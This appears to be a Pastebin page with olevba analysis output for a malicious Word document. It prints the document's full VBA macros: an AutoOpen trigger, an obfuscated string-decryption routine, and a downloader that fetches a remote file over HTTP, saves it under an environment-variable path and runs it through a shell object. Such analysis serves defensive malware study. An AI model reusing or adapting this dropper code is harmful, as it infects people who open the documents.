Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MAS--B- 66684798.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: 66684798.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: 66684798.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub autoopen()
- S6Wrk7025w4
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO dfsdfsdf.bas
- in file: 66684798.doc - OLE stream: u'Macros/VBA/dfsdfsdf'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub LZHGWIJZGNT()
- MQtf7O h08Nt7g80a0OJNSxSH__54e("¬ØÆÀ„‘ˆ®—€š‡u•‰~{˜Œ~œ‚ˆz‘»¾•¹Ãƒ‘Ä¥ÒÅÀxÌÉ«", "DdRPJbYu"), Environ(h08Nt7g80a0OJNSxSH__54e("¡¶¼§", "MqoWLfWN")) & h08Nt7g80a0OJNSxSH__54e("½Þ¸º»¬Î×Ѻ‚ÀÍ", "akTTHHhq")
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Environ | May read system environment variables |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO sdfsdfggg.bas
- in file: 66684798.doc - OLE stream: u'Macros/VBA/sdfsdfggg'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Function MQtf7O(ByVal ãÏÐÃìðâûàï As String, ByVal øÐÃèâûàûâàï As String) As Boolean
- Dim øÏíãìûâãàÀ As Object, äØÙÐãîøâûàà As Long, ùÈÎÐâûàààà As Long, ðãÏÈÃÈÐâààà() As Byte
- Set øÏíãìûâãàÀ = CreateObject(h08Nt7g80a0OJNSxSH__54e("¦¨œž¼£€¹¢™ÄÅ¢", "YUDQpqRa"))
- øÏíãìûâãàÀ.Open h08Nt7g80a0OJNSxSH__54e("´”½", "mOiNlEdE"), ãÏÐÃìðâûàï, False
- øÏíãìûâãàÀ.Send h08Nt7g80a0OJNSxSH__54e("…", "PJbKhRbh")
- ðãÏÈÃÈÐâààà = øÏíãìûâãàÀ.responseBody
- ùÈÎÐâûàààà = FreeFile
- Open øÐÃèâûàûâàï For Binary As #ùÈÎÐâûàààà
- Put #ùÈÎÐâûàààà, , ðãÏÈÃÈÐâààà
- Close #ùÈÎÐâûàààà
- Dim îðÈÃãèðââà
- Set îðÈÃãèðââà = CreateObject(h08Nt7g80a0OJNSxSH__54e("·Ø¬ÂÏ“¯¼à³¿ÆÆâÍßµ", "dpGVcenL"))
- îðÈÃãèðââà.Open Environ(h08Nt7g80a0OJNSxSH__54e("›¯¹£", "GjlSYrAo")) & h08Nt7g80a0OJNSxSH__54e("±‡†ƒ‰{‡†…ƒŠt²Í¶", "UQQPUFMT")
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- | Suspicious | Environ | May read system environment variables |
- | Suspicious | Put | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Binary | May read or write a binary file (if |
- | | | combined with Open) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: 66684798.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function h08Nt7g80a0OJNSxSH__54e(ByVal lvFUAJ4O4Ww As String, ByVal HQ07 As String)
- Dim D1WW3_661OJL03d46MkaCZS() As Byte
- Dim AF8S1() As Byte
- Dim iKuNclvIQNbaO15, jbUlyOYaUaoVg84 As Integer
- jbUlyOYaUaoVg84 = 3444
- For iKuNclvIQNbaO15 = 0 To 97
- jbUlyOYaUaoVg84 = jbUlyOYaUaoVg84 + iKuNclvIQNbaO15
- DoEvents
- Next iKuNclvIQNbaO15
- D1WW3_661OJL03d46MkaCZS = StrConv(lvFUAJ4O4Ww, vbFromUnicode)
- AF8S1 = StrConv(HQ07, vbFromUnicode)
- For i = 0 To UBound(D1WW3_661OJL03d46MkaCZS)
- If i <= UBound(AF8S1) Then
- D1WW3_661OJL03d46MkaCZS(i) = D1WW3_661OJL03d46MkaCZS(i) - AF8S1(i)
- Else
- D1WW3_661OJL03d46MkaCZS(i) = D1WW3_661OJL03d46MkaCZS(i) - AF8S1(i Mod UBound(AF8S1))
- End If
- Next i
- h08Nt7g80a0OJNSxSH__54e = StrConv(D1WW3_661OJL03d46MkaCZS, vbUnicode)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement